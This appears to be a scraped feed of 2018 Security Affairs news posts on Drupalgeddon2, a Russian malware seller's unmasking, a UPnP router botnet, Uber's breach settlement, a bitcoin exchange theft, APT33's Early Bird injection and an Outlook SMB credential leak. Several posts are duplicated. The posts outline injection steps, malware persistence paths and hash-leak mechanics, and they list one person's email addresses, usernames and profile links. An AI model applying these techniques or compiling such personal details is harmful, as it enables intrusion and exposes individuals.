At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by the Drupal developers Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are no more supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates and experts called it Drupalgeddon2.

Drupal development team released the security update in time to address CVE-2018-7600.

drupalgeddon2

A week after the release of the security update, a proof-of-concept (PoC) exploit was publicly disclosed.

The experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

“In brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication.” reads the analysis.

“By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.”

After the publication of the report. the expert Vitalii Rudnykh shared a working  Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

The experts at the Sucuri firm confirmed that they are seeing attempts for the Drupal RCE (CVE-2018-7600) in the wild, below the Tweet published by Sucuri founder and CTO Daniel Cid.

According to the researchers at the SANS Institute, threat actors are currently scanning the web for vulnerable servers using simple commands such as echo, phpinfo, whoami, and touch.

“The payload pings a host where the hostname of the target is prefixed to the hostname to be pinged. This is sort of interesting as mu6fea[.]ceye[.]io is a wildcard DNS entry, and *.mu6fea[.]ceye[.]io appears to resolve to 118.192.48.48 right now. So the detection of who is “pinging” is made most likely via DNS.” states the SANS.

Experts have no doubts, hackers will start soon exploiting the flaw to hack vulnerable websites in the wild.

Pierluigi Paganini

(Security Affairs – Drupal, Drupalgeddon2)

The post Experts warn threat actors are scanning the web for Drupal installs vulnerable to Drupalgeddon2 appeared first on Security Affairs.

When the Russian Malware coder Gatsoev is praised by the Russian head of Information Department of the Ministry of Education and Science of North Ossetia

When the Russian young Malware coder is praised by the Russian head of Information Department of the Ministry of Education and Science of North Ossetia. Under the spotlight: the story of Atsamaz Gatsoev (aka “1ms0rry”) who has set up his illegal business.

A new write-up made by a security researcher known as Benkow (@Benkow_) has been published, as ever on Sunday, and to be more precise on Sunday 8 April.

It’s about the story of a malware coder from Russia who is developing and selling two kinds of malware (a password stealer and a miner) with a lot of features and a variegated commercial offer: this malware actor is targeting also Russian people with his malware but Mr. Freud would absolve him (form the psychological point of view) analysing his nickname. The nickname, in fact, is “Im Sorry” (1ms0rry) which maybe talks about his interior drama: nevertheless, looking at what he does in his life the drama and the sorrow are for the thousands of victims he makes cry with his work.

The incredible side of this story is that the man has declared to not be worried to be recognized with his real name after Benkow crew has unmasked the real identity of this young criminal with a great page of investigative journalism.

But let’s go with order.

First of all we have to say that this time the post is written in cooperation with some Benkow’s (and this post author Odisseus) friends and the list of them is reported below in the same order can be found on the Benkow_ post: they are “.sS.!, coldshell, fumik0_, siri_urz, VxVault, Cybercrime-Tracker, MalwareMustDie, .sS.! (again)”.

Yes, at the beginning of the post there is this image showing there are no doubts that #MalwareMustDie team has also given a contribution in this post: interviewed by the author of this post, Odisseus, mr. @unixfreaxjp said that, of course, we have to expect more to come about malware and reversing from the #MMD team in the future.

Going back to the post published by Benkow, we have a very interesting work about the malware analysis referring the features spotted in the wild of a password Stealer malware made by “1ms0rry”: everything starts from a post published on a Russian hacker forum at the URL of the ifud.ws site the 7th of September 2017. There, a Russian hacker called “1ms0rry” – on Twitter (@ims0rry_off) – has published a post about a “Stealer N0F1L3 + admin panel ims0rry” with many different features. But let’s give a look at the malware capabilities.

First Malware: Starter Stealer N0F1L3 v1

Giving a closer look to his advertising page on the hack forum page as is possible to read in English – translated by Russian thanks to Google – the following detailed features of the malware are offered: the “Starter Stealer” is written in C# and is able to steal passwords from 7 internet browsers: the price is 20$ for the build version and 600$ for the source code.

But this is not all, the malware is able to do more:

  • Steal passwords and cookies from Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex
  • Attack Crypto-Currencies wallets (btc, electrum, ltc, eth, bcn, DSH, XMR, ZEC)
  • Steal Filezilla Passwords
  • Get every file on the desktop with the extensions .txt .doc .docx .log

The password stealer malware has also the following features:

  • It is declared as FUD (maximum error from 0 to 5)
  • works without admin rights
  • build weight is 2 mb
  • supports all add-ons

The Benkow post reports that what is interesting how 1ms0rry stealer is able to attack also Russian browsers like Yandex.

As is possible to see in the C&C logs provided by the Benkow post, many IP addresses are related to the Russian Federation:

Regarding the C&C panels, they have some the vulnerabilities: it can be easy to change the password, Benkow reports how to, providing even detailed list of IOCs and Yara for the malware admin panel.

First Malware, the Advanced version N0F1L3 v2

The malware offer list includes an advanced version of the password stealer which is named N0F1L3 v2 and is injected by this malware called “Paradox Crypter” almost recognized by most of Antivirus and having a good detection ratio on Virustotal (46/67)

The advanced version is written in C – C++ and now is able to steal password also from Firefox.

Second Malware 1ms0rry Miner

The second malware is a made by a loader and a miner: the LoaderBot is developed in .NET and as Benkow says it reuses a lot of code by N0F1L3.

The LoaderBot it is a process that kills itself in the Task Manager then is not visible and install itself in the following PATH: C:\users\%userprofile%\AppData\Roaming\Windows\

The persistence of the LoaderBot is achieved by installing the adding an item in the Windows Registry hive called at the startup: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

As shown by Benkow the available feature are Update, Download and Execute, and the connection to the C&C is achieved using a Mozilla User-Agent defined like as “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0”

This means that first the infection is carried on by the Loader then the attacker installs the Miner.

The Miner is developed in C++, is able to hide itself, to detect a Wallet address in the clipboard and replace it: it runs RunPe using a known process hollowing procedure and the following System API CreateProcessA(Suspended)/SetThreadContext/WriteProcessMemoryResumeThread/ and the code is a copy paste from GitHub

For the details of C&C, vulnerabilities and attack vector they are widely provided in the Benkow research.

What is interesting now is how has been correlated with the “1ms0rry” nickname with a very promising Russian student named Ацамаз Гацоев or Atsamaz Gatsoev.

The core of the story: 1ms0rry identity has been unmasked

First of all the Russian guy has a Twitter account that is “Im Sorry” with the following URL: https://twitter.com/ims0rry_off. The account is still working at the moment, and the malware actor is answering till 17 hours ago at the moment we are writing.

“Im Sorry” answered to the tweet where Benkow launched his post about him telling to be happy to have people talking about his work, because he doesn’t hide his identity, on the contrary, he is happy that his crimes are associated to him.

That probably explains why as a malware actor he didn’t try to hide himself arriving to answer to another security researcher who was highlighting the IP address of one of his C&C panel:

At the beginning point, looking for “Im Sorry” have been found some accounts on different platforms: he has an account on Telegram, on GitHub and different mail addresses like:

with the following nicknames:

  • Gatsoev
  • hype
  • ims0rry
  • s0rry
  • Your Name

Then looking for lordatsa@mail.ru Benkow has found a mail.ru account at the following URL https://my.mail.ru/mail/lordatsa/photo that give us a first name and a second name: Аца Гацоев (Atsa Gatsoev) enabling to find something more, for instance the information contained in this Weblancer  profile: https://www.weblancer.net/users/hypega/

Many interesting things are here, says Benkow:

  • the name Ацамаз Гацоев (Atsamaz Gatsoev) is the same as the mail.ru account,
  • The username used is hypega. hype was used to commit on github, hypega for “hypeGatsoev”
  • The personal website in the profile’s information is http://lordatsa.wix.com/gatsoevsummary and “lordatsa” is used as username for mail.ru http://lordatsa.wix.com/gatsoevsummary is also interesting to get other two profiles on VK and Google Plus.
  • From Google Plus the step to achieve the YouTube profile is easy: a good surprise is that in one of his videos Benkow and his crew found a special evidence related to a path raised during the password straealer reversing: a directory named [NEW] builder on the desktop of the user “gorno” is exactly what is raised in the pdb analysis of the LoaderBot: c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb

Then the user is “gorno” as is possible to see in the video at second 6 that there is Thermida and a local path, again “gorno” C:\Users\gorno\Desktop\winhost.exe

And again in another video it is possible to see “the viruscheckmate user” that is again “hypega”.

The name “hypega” give the opportunity to retrieve another 2 very interesting links:

This last one gives us the final proof that “1ms0rry” is Atsamaz Gatsoev.

How a criminal is working for the office of  Russian “Information technologies and communications” of  North Ossetia

What is probably confusing, looking at his photographs, is that he has the “face” of the good boy: and this is confirmed from a very recent and amazing post by Alan Salbiev in the 2013 known as “head of the Information Department of the Ministry of Education and Science of North Ossetia” and from 2017 is at “Management of North Ossetia-Alania in information technologies and communications Local business Vladikavkaz, Russia”

The 20th of March he writes the following Facebook post talking about “1ms0rry” as one who has done a great job in his office and more over he says that on “February 25, 2018 at competitions on sports hacking at the University ITMO our hero confidently walked rivals from Komsomolsk-on-Amur,  Khanty-Mansiysk, Penza, Pyatigorsk, etc. As a result, a schoolboy from Vladikavkaz entered the top 15 in St. Petersburg.

At Atsamaz there is a dream – to enter the University of ITMO. Our Office will provide every possible assistance to a talented guy”.

Here the post:

We don’t know how much Mr.  Alan Salbiev knows about his “dream” if he knows if he is a criminal or if he thinks that as a CTF hacker he has to get his Gym to become a perfect champion in Russia hacking and illegally stealing password or cryptocurrency to people in Russian and around the world.

For sure Europol or FBI now are hoping he is going to participate soon in competitions on sports hacking or some CTF competitions in Europe or USA.

About the Author: Odisseus

Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(Security Affairs – Russia, Gatsoev)

The post When the Russian Malware coder Gatsoev is praised by the Russian head of Information Department of the Ministry of Education and Science of North Ossetia appeared first on Security Affairs.

Security Affairs: When the Russian Malware coder Gatsoev is praised by the Russian head of Information Department of the Ministry of Education and Science of North Ossetia

When the Russian young Malware coder is praised by the Russian head of Information Department of the Ministry of Education and Science of North Ossetia. Under the spotlight: the story of Atsamaz Gatsoev (aka “1ms0rry”) who has set up his illegal business.

A new write-up made by a security researcher known as Benkow (@Benkow_) has been published, as ever on Sunday, and to be more precise on Sunday 8 April.

It’s about the story of a malware coder from Russia who is developing and selling two kinds of malware (a password stealer and a miner) with a lot of features and a variegated commercial offer: this malware actor is targeting also Russian people with his malware but Mr. Freud would absolve him (form the psychological point of view) analysing his nickname. The nickname, in fact, is “Im Sorry” (1ms0rry) which maybe talks about his interior drama: nevertheless, looking at what he does in his life the drama and the sorrow are for the thousands of victims he makes cry with his work.

The incredible side of this story is that the man has declared to not be worried to be recognized with his real name after Benkow crew has unmasked the real identity of this young criminal with a great page of investigative journalism.

But let’s go with order.

First of all we have to say that this time the post is written in cooperation with some Benkow’s (and this post author Odisseus) friends and the list of them is reported below in the same order can be found on the Benkow_ post: they are “.sS.!, coldshell, fumik0_, siri_urz, VxVault, Cybercrime-Tracker, MalwareMustDie, .sS.! (again)”.

Yes, at the beginning of the post there is this image showing there are no doubts that #MalwareMustDie team has also given a contribution in this post: interviewed by the author of this post, Odisseus, mr. @unixfreaxjp said that, of course, we have to expect more to come about malware and reversing from the #MMD team in the future.

Going back to the post published by Benkow, we have a very interesting work about the malware analysis referring the features spotted in the wild of a password Stealer malware made by “1ms0rry”: everything starts from a post published on a Russian hacker forum at the URL of the ifud.ws site the 7th of September 2017. There, a Russian hacker called “1ms0rry” – on Twitter (@ims0rry_off) – has published a post about a “Stealer N0F1L3 + admin panel ims0rry” with many different features. But let’s give a look at the malware capabilities.

First Malware: Starter Stealer N0F1L3 v1

Giving a closer look to his advertising page on the hack forum page as is possible to read in English – translated by Russian thanks to Google – the following detailed features of the malware are offered: the “Starter Stealer” is written in C# and is able to steal passwords from 7 internet browsers: the price is 20$ for the build version and 600$ for the source code.

But this is not all, the malware is able to do more:

  • Steal passwords and cookies from Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex
  • Attack Crypto-Currencies wallets (btc, electrum, ltc, eth, bcn, DSH, XMR, ZEC)
  • Steal Filezilla Passwords
  • Get every file on the desktop with the extensions .txt .doc .docx .log

The password stealer malware has also the following features:

  • It is declared as FUD (maximum error from 0 to 5)
  • works without admin rights
  • build weight is 2 mb
  • supports all add-ons

The Benkow post reports that what is interesting how 1ms0rry stealer is able to attack also Russian browsers like Yandex.

As is possible to see in the C&C logs provided by the Benkow post, many IP addresses are related to the Russian Federation:

Regarding the C&C panels, they have some the vulnerabilities: it can be easy to change the password, Benkow reports how to, providing even detailed list of IOCs and Yara for the malware admin panel.

First Malware, the Advanced version N0F1L3 v2

The malware offer list includes an advanced version of the password stealer which is named N0F1L3 v2 and is injected by this malware called “Paradox Crypter” almost recognized by most of Antivirus and having a good detection ratio on Virustotal (46/67)

The advanced version is written in C – C++ and now is able to steal password also from Firefox.

Second Malware 1ms0rry Miner

The second malware is a made by a loader and a miner: the LoaderBot is developed in .NET and as Benkow says it reuses a lot of code by N0F1L3.

The LoaderBot it is a process that kills itself in the Task Manager then is not visible and install itself in the following PATH: C:\users\%userprofile%\AppData\Roaming\Windows\

The persistence of the LoaderBot is achieved by installing the adding an item in the Windows Registry hive called at the startup: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

As shown by Benkow the available feature are Update, Download and Execute, and the connection to the C&C is achieved using a Mozilla User-Agent defined like as “Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0”

This means that first the infection is carried on by the Loader then the attacker installs the Miner.

The Miner is developer in C++, is able to hide itself, to detect a Wallet address in the clipboard and replace it: it runs RunPe using a known process hollowing procedure and the following System API CreateProcessA(Suspended)/SetThreadContext/WriteProcessMemoryResumeThread/ and the code is a copy paste from GitHub

For the details of C&C, vulnerabilities and attack vector they are widely provided in the Benkow research.

What is interesting now is how has been correlated with the “1ms0rry” nickname with a very promising Russian student named Ацамаз Гацоев or Atsamaz Gatsoev.

The core of the story: 1ms0rry identity has been unmasked

First of all the Russian guy has a Twitter account that is “Im Sorry” with the following URL: https://twitter.com/ims0rry_off. The account is still working at the moment, and the malware actor is answering till 17 hours ago at the moment we are writing.

“Im Sorry” answered to the tweet where Benkow launched his post about him telling to be happy to have people talking about his work, because he doesn’t hide his identity, on the contrary, he is happy that his crimes are associated to him.

That probably explains why as a malware actor he didn’t try to hide himself arriving to answer to another security researcher who was highlighting the IP address of one of his C&C panel:

At the beginning point, looking for “Im Sorry” have been found some accounts on different platforms: he has an account on Telegram, on GitHub and different mail addresses like:

with the following nicknames:

  • Gatsoev
  • hype
  • ims0rry
  • s0rry
  • Your Name

Then looking for lordatsa@mail.ru Benkow has found a mail.ru account at the following URL https://my.mail.ru/mail/lordatsa/photo that give us a first name and a second name: Аца Гацоев (Atsa Gatsoev) enabling to find something more, for instance the information contained in this Weblancer  profile: https://www.weblancer.net/users/hypega/

Many interesting things are here, says Benkow:

  • the name Ацамаз Гацоев (Atsamaz Gatsoev) is the same as the mail.ru account,
  • The username used is hypega. hype was used to commit on github, hypega for “hypeGatsoev”
  • The personal website in the profile’s information is http://lordatsa.wix.com/gatsoevsummary and “lordatsa” is used as username for mail.ru http://lordatsa.wix.com/gatsoevsummary is also interesting to get other two profiles on VK and Google Plus.
  • From Google Plus the step to achieve the YouTube profile is easy: a good surprise is that in one of his videos Benkow and his crew found a special evidence related to a path raised during the password straealer reversing: a directory named [NEW] builder on the desktop of the user “gorno” is exactly what is raised in the pdb analysis of the LoaderBot: c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb

Then the user is “gorno” as is possible to see in the video at second 6 that there is Thermida and a local path, again “gorno” C:\Users\gorno\Desktop\winhost.exe

And again in another video it is possible to see “the viruscheckmate user” that is again “hypega”.

The name “hypega” give the opportunity to retrieve another 2 very interesting links:

This last one gives us the final proof that “1ms0rry” is Atsamaz Gatsoev.

How a criminal is working for the office of  Russian “Information technologies and communications” of  North Ossetia

What is probably confusing, looking at his photographs, is that he has the “face” of the good boy: and this is confirmed from a very recent and amazing post by Alan Salbiev in the 2013 known as “head of the Information Department of the Ministry of Education and Science of North Ossetia” and from 2017 is at “Management of North Ossetia-Alania in information technologies and communications Local business Vladikavkaz, Russia”

The 20th of March he writes the following Facebook post talking about “1ms0rry” as one who has done a great job in his office and more over he says that on “February 25, 2018 at competitions on sports hacking at the University ITMO our hero confidently walked rivals from Komsomolsk-on-Amur,  Khanty-Mansiysk, Penza, Pyatigorsk, etc. As a result, a schoolboy from Vladikavkaz entered the top 15 in St. Petersburg.

At Atsamaz there is a dream – to enter the University of ITMO. Our Office will provide every possible assistance to a talented guy”.

Here the post:

We don’t know how much Mr.  Alan Salbiev knows about his “dream” if he knows if he is a criminal or if he thinks that as a CTF hacker he has to get his Gym to become a perfect champion in Russia hacking and illegally stealing password or cryptocurrency to people in Russian and around the world.

For sure Europol or FBI now are hoping he is going to participate soon in competitions on sports hacking or some CTF competitions in Europe or USA.

About the Author: Odisseus

Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(Security Affairs – Russia, Gatsoev)

The post When the Russian Malware coder Gatsoev is praised by the Russian head of Information Department of the Ministry of Education and Science of North Ossetia appeared first on Security Affairs.



Security Affairs

Experts uncovered a proxy botnet composed of over 65,000 routers exposed via UPnP protocol

Security researchers at Akamai have discovered a proxy botnet composed of more than 65,000 routers exposed to the Internet via the Universal Plug and Play (UPnP) protocol.

Crooks have compromised the devices of this multi-purpose proxy botnet to conduct a wide range of malicious activities, including spamming and phishing, click fraud, account takeover and credit card fraud, distributed denial of service (DDoS) attacks, malware distribution, and also bypassing censorship,

While the researchers were investigating attacks against its customers they discovered that vulnerable devices have NAT injections that allow attackers to abuse them.

“While researching UPnP-enabled devices detected as participants in attacks against Akamai customers, we discovered that some devices appeared to be more susceptible to this vulnerability than others, and contained malicious NAT injections.” reads the analysis published by Akamai. “These injections were present on a handful of the devices found in the wild, and appeared to be part of an organized and widespread abuse campaign”

proxy botnet injection bypass

Akamai discovered over 4.8 million devices that were found to be vulnerable to simple UDP SSDP inquiries. Of these, roughly 765,000 (16% of total) were confirmed to also
expose their vulnerable TCP implementations while over 65,000 (1.3% of total) were discovered to have NAT injections.

“These injections appeared to point to multiple services and servers around the Internet. A majority of the injections appear to target TCP ports 53 (15.9M for DNS), 80 (9.5M for HTTP), and 443 (155K for HTTPS).” continues the analysis. “A wide range of devices are affected, most of them being consumer-grade networking hardware. “73 brands/manufacturers and close to 400 models [were affected].”

The UPnP communication protocol is widely adopted even if it is known to be vulnerable. In early 2013, researchers at Rapid7 published an interesting whitepaper entitled “Security Flaws in Universal Plug and Play” that evaluated the global exposure of UPnP-enabled network devices.

The report highlighted that over 23 million IPs related to Portable UPnP SDK were vulnerable to remote code execution just through a single UDP packet, over 6,900 product versions from over 1,500 vendors were vulnerable through UPnP due to the exposure of UPnP SOAP service to the internet.

Abusing the protocol attackers can control the traffic in and out the networks, UPnP allows the automated negotiation and configuration of port opening/forwarding within a NATed networking environment.

The malicious botnet uncovered by Akamai is composed of vulnerable devices including malicious NAT injections, it turns routers into proxies, for this reason, the experts called the injected devices UPnProxy.

“The injected NAT entries were designed to be working in sets across various devices. Thus, across the 65,000 infected devices, 17,599 unique endpoint IP addresses were discovered.” continues the report. “The most-identified IP was injected over 18.8 million times across 23,286 devices, while the second-most-injected IP appeared over 11 million times across 59,943 devices.”

According to Akamai, part of this proxy botnet was already discovered by researchers at Symantec while investigating into the “Inception Framework” used by an APT group, in that circumstance Symantec research confirmed that the UPnProxy instances were used obfuscate the operators’ true locations.

The APT associated with Inception Framework is still active and continuously evolved its arsenal and TTPs.

In order to check if your router has been compromised for UPnProxying is to scan the endpoint and audit your NAT table entries.

Many frameworks and libraries available online could be used for this purpose.

Pierluigi Paganini

(Security Affairs – UPnP, proxy botnet)

The post Experts uncovered a proxy botnet composed of over 65,000 routers exposed via UPnP protocol appeared first on Security Affairs.

Uber agrees to new FTC settlement over 2016 data breach

Uber agrees to a new settlement with the Federal Trade Commission over the massive 2016 data breach, the authorities could assign civil penalties against the company if it will fail to share incident data with FTC.

Uber agrees to a new settlement with the Federal Trade Commission over the massive 2016 data breach.

“Uber Technologies, Inc. has agreed to expand the proposed settlement it reached with the Federal Trade Commission last year over charges that the ride-sharing company deceived consumers about its privacy and data security practices.” states the FTC.

“Due to Uber’s misconduct related to the 2016 breach, Uber will be subject to additional requirements. Among other things, the revised settlement could subject Uber to civil penalties if it fails to notify the FTC of certain future incidents involving unauthorized access of consumer information.”

In November 2017, the Uber CEO Dara Khosrowshahi announced that hackers broke into the company database and accessed the personal data of 57 million of its users, the disconcerting revelation was that the company covered up the hack for more than a year.

The attackers accessed also the names and driver’s license numbers of roughly 600,000 of its drivers in the United States.

The hack happened in 2016, it was easy for hackers that according to a report published by Bloomberg, obtained credentials from a private GitHub site used by the company development team. The hackers tried to blackmail Uber and demanded $100,000 from the company in exchange for avoiding publish the stolen data.

Rather than to notify the data breach to customers and law enforcement as is required by California’s data security breach notification law, the chief of information security Joe Sullivan ordered to pay the ransom and to cover the story destroying any evidence. The payout was disguised as a bug bounty prize complete with non-disclosure agreements signed

uber

In 2017 the FTC charged the company for deceiving customers with its privacy and data security practices.

The first settlement dated back August 2017, according to the FTC, the company failed to apply security measures to protect customers and drivers data, later while investigating the settlement, the Commission discovered that the company did not disclose the 2016 data breach before 2017.

According to the new settlement with the Federal Trade Commission, Uber is obliged to disclose any future breach affecting consumer data and share reports from required third-party audits of its privacy program.

The company must maintain records related to bug bounty activities, the authorities could assign civil penalties against the company in case it will fail to implement the above actions.

After misleading consumers about its privacy and security practices, Uber compounded its misconduct by failing to inform the Commission that it suffered another data breach in 2016 while the Commission was investigating the company’s strikingly similar 2014 breach,” said Acting FTC Chairman Maureen K. Ohlhausen. “The strengthened provisions of the expanded settlement are designed to ensure that Uber does not engage in similar misconduct in the future.

Pierluigi Paganini

(Security Affairs – FTC settlement, Uber data breach)

The post Uber agrees to new FTC settlement over 2016 data breach appeared first on Security Affairs.

$3.3 Million stolen from main Coinsecure Bitcoin wallet

Cryptocurrency exchange Coinsecure, India’s second exchange, announced that it has suffered a severe issue, 438 bitcoin, $3,3 million worth of bitcoin

Cryptocurrency exchange Coinsecure, India’s second exchange, announced that it has suffered a severe issue, 438 bitcoin, $3,3 million worth of bitcoin, have been transferred from the main wallet to an account that is not under their control.

CEO Mohit Kalra said that only he the Chief Strategist officer (CSO) Dr. Amitabh Saxena had private keys to the exchange’s main wallet.

“The current issue points towards losses caused during an exercise to extract BTG to distribute to our customers. Our Chief Strategist officer (CSO) Dr. Amitabh Saxena was extracting BTG and he claims that the funds have been lost in the process during the extraction of the private keys.” reads the statement published by Coinsecure. 

According to the CEO of Coinsecure, the CSO is responsible for the transfer, the company posted two imaged on the websites containing company statement signed by the Coinsecure team and a scanned copy of a police complaint filed by Coinsecure CEO Mohit Kalra.

coinsecure hack

The Coinsecure CEO excluded the transfer was the result of a hack and accused the CSO, but Dr. Saxena denied any involvement in the case and informed Coinsecure that the funds “were stolen from company’s Bitcoin wallet due to some attack.”.

“Our system itself has never been compromised or hacked, and the current issue points towards losses caused during an exercise to extract BTG [Bitcoin Gold] to distribute to our customers, ” the Coinsecure team wrote in its statement

“Our CSO, Dr. Amitabh Saxena, was extracting BTG and he claims that funds have been lost in the process during the extraction of the private keys,” Coinsecure added.

“[he] making a false story to divert [his] attention and might have a role to play in this entire incident.”

The CEO is asking local police to seize the Saxena’s passport because he fears that the employee “might fly out of the country soon.”

Pierluigi Paganini

(Security Affairs – Bitcoin, hacking)

The post $3.3 Million stolen from main Coinsecure Bitcoin wallet appeared first on Security Affairs.

APT33 devised a code injection technique dubbed Early Bird to evade detection by anti-malware tools

The Iran-linked APT33 group continues to be very active, security researchers at Cyberbit have discovered an Early Bird code injection technique used by the group.

The Early Bird method was used to inject the TurnedUp malware into the infected systems evading security solutions.

The technique allows injecting a malicious code into a legitimate process, it allows execution of malware before the entry point of the main thread of a process.

“We saw this technique used by various malware. Among them – the “TurnedUp” backdoor written by APT33 – An Iranian hackers group, A variant of the notorious “Carberp” banking malware and by the DorkBot malware.” reads the analysis published by the experts.

“The malware code injection flow works as follows:

  1. Create a suspended process (most likely to be a legitimate windows process)
  2. Allocate and write malicious code into that process
  3. Queue an asynchronous procedure call (APC) to that process
  4. Resume the main thread of the process to execute the APC”

Anti-malware tools insert hooks when a process starts running, the code sections placed on specific Windows API calls allows security solution to detect the threats while invoking the API.

APT33 Early Bird technique allows bypassing the anti-malware hooking mechanism.

The Early Bird technique “loads the malicious code in a very early stage of thread initialization, before many security products place their hooks – which allows the malware to perform its malicious actions without being detected,” continues the analysis published by Cyberbit.

Experts noticed that during the initialization phase of the main thread, immediately after the call to NtResumeThread, a function called NtTestAlert checks the APC queue to delay the code of the main threat until the APC code is finished.

“During the initialization phase of the main thread (Right after the call to NtResumeThread), a function called NtTestAlert checks the APC queue. If the APC queue is not empty – NtTestAlert will notify the kernel which in return jump to KiUserApcDispatcher which will execute the APC. The code of the main thread itself will not execute until the code of the APC is finished executing,” continues the analysis.

“Before returning to user-mode, the kernel prepares the user-mode thread to jump to KiUserApcDispatcher which will execute the malicious code in our case,” 

early bird injection

Differently from other methods, the Early Bird technique aims to hide the malicious actions executed post-injection.

The APT33 group has been around since at least 2013, since mid-2016, the group targeted the aviation industry and energy companies with connections to petrochemical production.

Pierluigi Paganini

(Security Affairs – Early Bird code injection, APT33)

The post APT33 devised a code injection technique dubbed Early Bird to evade detection by anti-malware tools appeared first on Security Affairs.

CVE-2018-0950 flaw in Microsoft Outlook could be exploited to steal Windows Passwords

An 18-month-old CVE-2018-0950 vulnerability in Microsoft Outlook could be exploited by hackers to steal the Windows Password.

Almost 18 months ago, the security researcher Will Dormann of the CERT Coordination Center (CERT/CC) has found a severe vulnerability in Microsoft Outlook (CVE-2018-0950), time is passed but Microsoft partially addressed it with the last Patch Tuesday updates.
The flaw in Microsoft Outlook ties the way Microsoft Outlook renders remotely-hosted OLE content when an RTF (Rich Text Format) an email is previewed and automatically initiates SMB connections.

The CVE-2018-0950 flaw could be exploited by attackers to steal sensitive data such as Windows login credentials by tricking victims into preview an email with Microsoft Outlook,
“Outlook blocks remote web content due to the privacy risk of web bugs. But with a rich text email, the OLE object is loaded with no user interaction. Let’s look at the traffic in Wireshark to see what exactly is being leaked as the result of this automatic remote object loading.” wrote Dormann.

The vulnerability, discovered by Will Dormann of the CERT Coordination Center (CERT/CC), resides in the way Microsoft Outlook renders remotely-hosted OLE content when an RTF (Rich Text Format) email message is previewed and automatically initiates SMB connections.

The attack scenario sees a remote attacker exploiting the vulnerability by sending an RTF email to the victim, the malicious message contains an image file (OLE object) that is loaded from a remote SMB server under the control of the attackers.

“Here we can see than an SMB connection is being automatically negotiated. The only action that triggers this negotiation is Outlook previewing an email that is sent to it.” The following screenshot shows that IP address, domain name, Username, hostname, SMB session key are being leaked.

CVE-2018-0950

“Microsoft Outlook will automatically retrieve remote OLE content when an RTF email is previewed. When remote OLE content is hosted on a SMB/CIFS server, the Windows client system will attempt to authenticate with the server using single sign-on (SSO).” states the CERT. “This may leak the user’s IP address, domain name, user name, host name, and password hash. If the user’s password is not complex enough, then an attacker may be able to crack the password in a short amount of time.”

Microsoft Outlook automatically renders OLE content, this means that it will initiate an automatic authentication with the attacker’s controlled remote server over SMB protocol using single sign-on (SSO). This will cause the leak of NTLMv2 hashed version of the password that could be cracked by the attacks with commercial tools and services.

Microsoft attempted to address the flaw in the last security updates, but it only successfully fixed automatically SMB connections when it previews RTF emails, any other SMB attack is still feasible.

“It is important to realize that even with this patch, a user is still a single click away from falling victim to the types of attacks described above,” Dormann added. “For example, if an email message has a UNC-style link that begins with “\\”, clicking the link initiates an SMB connection to the specified server.”

SMB-hack-outlook

Summarizing, the installation of the Microsoft update for CVE-2018-0950 will not fully protect users from the exploitation of this issue.

Users are advised to apply the following mitigations:

  • Install the Microsoft update for CVE-2018-0950.
  • Block ports 445/tcp, 137/tcp, 139/tcp, along with 137/udp and 139/udp used for SMB sessions.
  • Block NT LAN Manager (NTLM) Single Sign-on (SSO) authentication.
  • Always strong passwords.
  • Never  click on suspicious links embedded in emails.

Pierluigi Paganini

(Security Affairs – CVE-2018-0950, Microsoft Outook)

The post CVE-2018-0950 flaw in Microsoft Outlook could be exploited to steal Windows Passwords appeared first on Security Affairs.

Security Affairs: CVE-2018-0950 flaw in Microsoft Outlook could be exploited to steal Windows Passwords

An 18-month-old CVE-2018-0950 vulnerability in Microsoft Outlook could be exploited by hackers to steal the Windows Password.

Almost 18 months ago, the security researcher Will Dormann of the CERT Coordination Center (CERT/CC) has found a severe vulnerability in Microsoft Outlook (CVE-2018-0950), time is passed but Microsoft partially addressed it with the last Patch Tuesday updates.
The flaw in Microsoft Outlook ties the way Microsoft Outlook renders remotely-hosted OLE content when an RTF (Rich Text Format) an email is previewed and automatically initiates SMB connections.

The CVE-2018-0950 flaw could be exploited by attackers to steal sensitive data such as Windows login credentials by tricking victims into preview an email with Microsoft Outlook,
“Outlook blocks remote web content due to the privacy risk of web bugs. But with a rich text email, the OLE object is loaded with no user interaction. Let’s look at the traffic in Wireshark to see what exactly is being leaked as the result of this automatic remote object loading.” wrote Dormann.

The vulnerability, discovered by Will Dormann of the CERT Coordination Center (CERT/CC), resides in the way Microsoft Outlook renders remotely-hosted OLE content when an RTF (Rich Text Format) email message is previewed and automatically initiates SMB connections.

The attack scenario sees a remote attacker exploiting the vulnerability by sending an RTF email to the victim, the malicious message contains an image file (OLE object) that is loaded from a remote SMB server under the control of the attackers.

“Here we can see than an SMB connection is being automatically negotiated. The only action that triggers this negotiation is Outlook previewing an email that is sent to it.” The following screenshot shows that IP address, domain name, Username, hostname, SMB session key are being leaked.

CVE-2018-0950

